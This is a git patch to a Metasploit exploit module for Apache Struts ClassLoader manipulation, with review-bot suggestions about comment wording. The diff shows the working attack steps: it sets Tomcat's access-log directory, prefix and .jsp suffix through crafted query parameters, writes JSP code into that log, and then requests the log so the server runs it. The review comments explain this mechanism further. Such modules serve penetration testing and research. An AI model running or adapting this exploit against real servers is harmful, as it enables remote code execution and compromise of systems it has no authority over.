From b2c2245aff0eba40a98ebda7db67c97271d6cfcc Mon Sep 17 00:00:00 2001
From: julianvilas
Date: Tue, 29 Apr 2014 11:24:17 +0200
Subject: [PATCH] Add comments
---
 .../multi/http/struts_code_exec_classloader.rb | 13 +++++++++----
 1 file changed, 9 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb
index d6f11c9fac..8d3743e644 100644
--- a/modules/exploits/multi/http/struts_code_exec_classloader.rb
+++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb
@@ -90,10 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote
 date_format = rand_text_numeric(1+rand(4))
 vprint_status("#{peer} - Modifying class loader")
- exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT")
- exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}")
- exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp")
- exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}")
+
+ # Modifies classLoader parameters
+ exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created
+ exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename
+ exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension
+ exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix"
 jsp_file = prefix_jsp
 jsp_file << date_format
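Review bot: The trailing comment on the added `directory=webapps/ROOT` line has a typo, `os` for `is`; suggest `# Directory where the log file is going to be created`. The four explanatory comments are appended to lines that are already well over 120 characters, so they are easy to overlook; placing each one on its own line above the corresponding `exec_cmd` call, or folding them into the `# Modifies classLoader parameters` header as a short list (directory, prefix, suffix, fileDateFormat), would read better. The formula quoted on the `fileDateFormat` line, `"prefix+fileDateFormat.suffix"`, is exactly how `jsp_file` is assembled from `prefix_jsp` and `date_format` on the last two lines of the hunk, and a comment such as `# jsp_file must match the server-side name: prefix + fileDateFormat + suffix` above `jsp_file = prefix_jsp` would make that dependency explicit. The enclosing method starts before this hunk and continues after it.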
@@ -103,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote
 sleep(3)
+ # Inexistent URI that logs on previously created log file (with ".jsp" suffix)
 uri = String.new(datastore['TARGETURI'])
 uri << rand_text_alphanumeric(4+rand(4))
 uri << "?"
@@ -115,6 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
 payload_file = rand_text_alphanumeric(4+rand(4))
 register_files_for_cleanup("#{payload_file}", "#{jsp_file}")
+ # Commands to be logged
 exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>")
 exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>")
 exec_cmd(uri, "<%@ page import=\"java.io.File\" %>")
@@ -133,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}")
+ # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences
 uri = "/"
 uri << jsp_file
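Review bot: The added comment `# Inexistent URI that logs on previously created log file (with ".jsp" suffix)` is not idiomatic English and is ambiguous about what is logged; suggest `# Nonexistent URI: the request for it is written to the log file created above (the one carrying the ".jsp" suffix)`. That phrasing also ties the line to `jsp_file`, which the previous hunk assembles from `prefix_jsp` and `date_format`. The same wording issue applies to the comment added in the last hunk, `# Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences`, which could read `# Request the log file under its ".jsp" name so the server compiles and runs the JSP code written into it`. The enclosing method starts before this hunk and continues after it.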
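Review bot: `# Commands to be logged` under-describes the `exec_cmd(uri, ...)` lines that follow it, whose second argument is JSP source (`<%@ page import=... %>` directives) rather than shell or OS commands, so "commands" misleads a reader skimming for what is sent; suggest `# JSP source lines, sent in the request so they are written into the log file that is later served as jsp_file`. Whether every line reaches the log verbatim depends on how `exec_cmd` encodes its second argument, which is defined outside this hunk, so that part is inferred from the surrounding comments. The enclosing method starts before this hunk and continues after it.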